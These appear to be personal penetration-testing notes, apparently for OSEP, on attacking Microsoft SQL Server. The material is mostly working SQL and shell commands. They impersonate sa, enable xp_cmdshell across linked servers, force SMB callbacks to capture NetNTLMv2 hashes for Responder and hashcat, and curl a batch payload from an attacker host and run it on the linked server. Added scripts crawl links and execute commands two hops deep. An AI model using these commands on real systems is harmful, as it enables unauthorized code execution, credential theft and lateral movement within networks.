#### hacksqlserver
PS: use together with GetUserSPNs.ps1. If an MSSQL SPN exists and the service account is an administrator on the target machine, or a SQL link is configured, command execution is possible.
```
-- is the given login a member of sysadmin? 1 = yes
SELECT IS_SRVROLEMEMBER('sysadmin','domain\administrator')
SELECT IS_SRVROLEMEMBER('sysadmin','domain\sqlsvc')
SELECT IS_SRVROLEMEMBER('sysadmin','domain\adminwebsvc')
-- 1 = the current login is a member of the public role
SELECT IS_SRVROLEMEMBER('public');
SELECT SYSTEM_USER;
SELECT USER_NAME();
-- logins the current login is allowed to impersonate (EXECUTE AS LOGIN)
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
EXEC sp_linkedservers;
-- run on the linked server; needs RPC Out on the link, and hyphenated link names must be bracketed
EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT [linked-hostname];
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [linked-hostname];
EXEC ('xp_cmdshell ''whoami'';') AT [linked-hostname];
-- OPENQUERY variant: only the first result set (select 1) comes back; test first that the privileges on the link suffice
select 1 from openquery("SQL05", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure')
select version from openquery("linked-hostname", 'select @@version as version') -- works!
...
-- capture the SQL service account's NetNTLMv2 hash: start responder, force an outbound SMB connection, crack with hashcat mode 5600
sudo responder -I tap0
EXEC master..xp_dirtree "\\192.168.49.57\share";
hashcat -m 5600   # NetNTLMv2
```
#### powerupsql
```
https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
```
### Attention
Fortunately, membership in the sysadmin role lets us enable xp_cmdshell through the advanced options and the sp_configure stored procedure. To do this we first impersonate the sa login. Then we use sp_configure to turn on advanced options, and then enable xp_cmdshell.

When enabling advanced options and xp_cmdshell, remember that the running configuration is only updated with the RECONFIGURE statement.

Let's review the code used to impersonate the sa login, turn on advanced options, enable xp_cmdshell and run the whoami command.
The RPC Out option, which is off by default, can also be enabled:

RPC Out is not enabled by default, but it is commonly turned on by sysadmins. If RPC Out is not allowed and our current user has sysadmin role membership, it can be switched on with the sp_serveroption stored procedure. Microsoft's documentation explicitly states that executing stored procedures on a linked SQL server through OPENQUERY is not supported; instead the AT keyword is used to specify on which linked SQL server the query should be executed, and that path requires RPC Out.

Listing 54 shows the query needed to enable advanced options.
Note: on the last hop, sql03, RPC was disabled, yet OPENQUERY could still be used to query it.
![[Pasted image 20220824203952.png]]
### Final prep: quick queries and a one-shot query script
```
SELECT SYSTEM_USER;
SELECT USER_NAME();
-- needs IMPERSONATE on sa (see the IMPERSONATE query above)
EXECUTE AS LOGIN = 'sa';
-- normally works if we have sa or dbo privileges and a SQL link is configured
select version from openquery("sqllinked-hostname", 'select @@version as version')
select * from openquery("sqllinked-hostname",'select * from master..sysservers')
select version from openquery("sqllinked-hostname", 'select SYSTEM_USER as version') -- works
select version from openquery("sqllinked-hostname", 'select USER_NAME() as version') -- works
-- command execution over the link (needs RPC Out); if this fails, use the OPENQUERY approach in the next section
EXEC sp_linkedservers;
EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT [sqllinked-hostname];
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sqllinked-hostname];
EXEC ('xp_cmdshell ''whoami'';') AT [sqllinked-hostname];
-- force an outbound SMB connection to capture the service account's NetNTLMv2 hash
EXEC master..xp_dirtree "\\192.168.49.110\share";
EXEC master..xp_dirtree "\\192.168.49.110\test\";
sudo responder -I tap0
hashcat -m 5600   # NetNTLMv2
```
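The one-shot script this section prepares for, as an added example that is not part of the original notes or the OSEP material: it walks every outbound link found in sys.servers (so no link name such as sqllinked-hostname is assumed), records the two flags that decide which technique applies (data_access for OPENQUERY, rpc_out for EXEC ... AT), and probes the login and sysadmin status reached on the far side of each link. Per-link failures are recorded rather than aborting the run. It runs as whatever login you already have; links the mapped login cannot use show up with an error_msg.

```sql
-- Added example (not from the original notes): enumerate every outbound link,
-- note data_access (OPENQUERY allowed) and rpc_out (EXEC ... AT allowed), and
-- probe the login/sysadmin context reached on the far side of each link.
SET NOCOUNT ON;
IF OBJECT_ID('tempdb..#links') IS NOT NULL DROP TABLE #links;
CREATE TABLE #links (
    link_name       sysname,
    data_access     bit,
    rpc_out         bit,
    remote_host     sysname        NULL,
    remote_login    sysname        NULL,
    remote_sysadmin int            NULL,
    remote_version  nvarchar(200)  NULL,
    error_msg       nvarchar(4000) NULL
);

-- local context first: who we are and whether we are already sysadmin here
SELECT SYSTEM_USER AS local_login, IS_SRVROLEMEMBER('sysadmin') AS local_sysadmin;

DECLARE @name sysname, @da bit, @rpc bit, @sql nvarchar(max);
DECLARE links CURSOR LOCAL FAST_FORWARD FOR
    SELECT name, is_data_access_enabled, is_rpc_out_enabled
    FROM sys.servers
    WHERE is_linked = 1;
OPEN links;
FETCH NEXT FROM links INTO @name, @da, @rpc;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- OPENQUERY needs the link name as a literal, so the probe is built as dynamic SQL;
    -- QUOTENAME brackets the name so hyphenated links such as sqllinked-hostname parse
    SET @sql = N'INSERT INTO #links (link_name, data_access, rpc_out, remote_host, remote_login, remote_sysadmin, remote_version)'
             + N' SELECT ' + QUOTENAME(@name, '''') + N', ' + CAST(@da AS nvarchar(1)) + N', ' + CAST(@rpc AS nvarchar(1))
             + N', remote_host, remote_login, remote_sysadmin, remote_version'
             + N' FROM OPENQUERY(' + QUOTENAME(@name) + N', ''SELECT @@SERVERNAME AS remote_host, SYSTEM_USER AS remote_login,'
             + N' IS_SRVROLEMEMBER(''''sysadmin'''') AS remote_sysadmin, LEFT(@@VERSION, 200) AS remote_version'')';
    BEGIN TRY
        EXEC sp_executesql @sql;
    END TRY
    BEGIN CATCH
        -- link down, data access disabled, or the mapped login lacks rights: record it and keep going
        INSERT INTO #links (link_name, data_access, rpc_out, error_msg)
        VALUES (@name, @da, @rpc, ERROR_MESSAGE());
    END CATCH;
    FETCH NEXT FROM links INTO @name, @da, @rpc;
END;
CLOSE links;
DEALLOCATE links;

-- remote_sysadmin = 1 and rpc_out = 1 -> EXEC ('...') AT [link] can enable xp_cmdshell there
-- remote_sysadmin = 1 and rpc_out = 0 -> try the OPENQUERY variant, or sp_serveroption if sysadmin locally
SELECT link_name, data_access, rpc_out, remote_host, remote_login, remote_sysadmin, remote_version, error_msg
FROM #links;
```

Read the result row by row: a link with remote_sysadmin = 1 is the one worth attacking, and the rpc_out column tells you whether to reach for EXEC ... AT or for the OPENQUERY form. A link that only ever returns an error_msg is usually data_access = 0 or a mapping to a login with no rights on the far side.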
### Unofficial mods
```
-- openquery -> xp_cmdshell looks like it fails: OPENQUERY only returns the first result set (select 1),
-- so the command may well have run with its output dropped. Confirm out of band (curl / xp_dirtree below).
select 1 from openquery("sqllinked-hostname", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure')
select 1 from openquery("sqllinked-hostname", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure')
select 1 from openquery("sqllinked-hostname", 'select 1; EXEC xp_cmdshell ''curl http://192.168.49.57:85''')
-- unofficial mod: force an SMB callback through OPENQUERY instead of EXEC ... AT
select 1 from openquery("sqllinked-hostname", 'select 1; EXEC master..xp_dirtree ''\\192.168.49.57\share''') -- succeeded!
-- with RPC Out available, stage and run a payload on the linked host
EXEC ('xp_cmdshell ''c:\users\public\pf.exe -i -c "cmd.exe /c c:\users\public\b.bat"'';') AT [sqllinked-hostname]
EXEC ('xp_cmdshell ''curl 192.168.49.57:82/a.bat -o c:\users\public\b.bat'';') AT [sqllinked-hostname]
EXEC ('xp_cmdshell ''dir c:\users\public\'';') AT [sqllinked-hostname]
```
### beyond osep
```
EXECUTE AS LOGIN = 'sa';
-- 1 = EXEC (...) AT [sqllinked-hostname] is allowed on this link
SELECT
is_rpc_out_enabled
FROM sys.servers
WHERE name = 'sqllinked-hostname';
-- requires sysadmin (here via the sa impersonation); afterwards the column above reads 1
EXEC sp_serveroption 'sqllinked-hostname', 'rpc out', 'true';
```
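An added example, not from the original notes or the OSEP material, that takes the RPC Out repair one hop further: a chain local -> sql02 -> sql03, where sql02 is a link on the local instance and sql03 a link defined on sql02 (both placeholder names). It assumes the login reached on sql02 is sysadmin there. It first fixes the rpc out flag on sql02's link through OPENQUERY (the same first-result-set trick the notes rely on), then enables xp_cmdshell on sql03 both with nested AT and with nested OPENQUERY; every single quote is doubled once per nesting level.

```sql
-- Added example: command execution two links deep. [sql02] is a link on the local
-- instance, [sql03] is a link defined on sql02 (placeholder names). Assumes the
-- context we land in on sql02 is sysadmin there.

-- 0. Which syntax is available on each hop? data_access -> OPENQUERY, rpc_out -> EXEC ... AT
SELECT name, is_data_access_enabled, is_rpc_out_enabled FROM sys.servers WHERE name = 'sql02';
SELECT * FROM OPENQUERY([sql02], 'SELECT name, is_data_access_enabled, is_rpc_out_enabled FROM sys.servers WHERE name = ''sql03''');

-- 1. If rpc out is off on sql02's link to sql03, turn it on from sql02 (needs sysadmin on sql02).
--    A leading SELECT gives OPENQUERY the rowset it insists on; the EXEC still runs.
SELECT * FROM OPENQUERY([sql02], 'SELECT 1; EXEC sp_serveroption ''sql03'', ''rpc out'', ''true''');

-- 2a. Nested AT: each level doubles every single quote.
EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; RECONFIGURE;'') AT [sql03];') AT [sql02];
EXEC ('EXEC (''sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE;'') AT [sql03];') AT [sql02];
EXEC ('EXEC (''xp_cmdshell ''''whoami'''';'') AT [sql03];') AT [sql02];

-- 2b. Same chain with nested OPENQUERY, for links where rpc out cannot be enabled.
--     xp_cmdshell output is not returned (only the SELECT 1 rowset is), so confirm
--     out of band, e.g. with a curl or xp_dirtree beacon as in the section above.
SELECT * FROM OPENQUERY([sql02], 'SELECT * FROM OPENQUERY([sql03], ''SELECT 1; EXEC sp_configure ''''show advanced options'''', 1; RECONFIGURE'')');
SELECT * FROM OPENQUERY([sql02], 'SELECT * FROM OPENQUERY([sql03], ''SELECT 1; EXEC sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE'')');
SELECT * FROM OPENQUERY([sql02], 'SELECT * FROM OPENQUERY([sql03], ''SELECT 1; EXEC xp_cmdshell ''''whoami'''''')');
```

The quoting is the only hard part: to check a nested statement, peel one level at a time by replacing each `''` with `'` and confirming the inner text is exactly what the next hop should receive. Step 1 is what makes the AT form in 2a possible; if it is not available, 2b runs blind and must be verified with a beacon.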
![[Pasted image 20220825001731.png]]
![[Pasted image 20220825001747.png]]
#### other
```
Get-SQLServerLinkCrawl -Instance instance1 -Query "exec master..xp_cmdshell 'cmd /c calc.exe'" -Verbose
```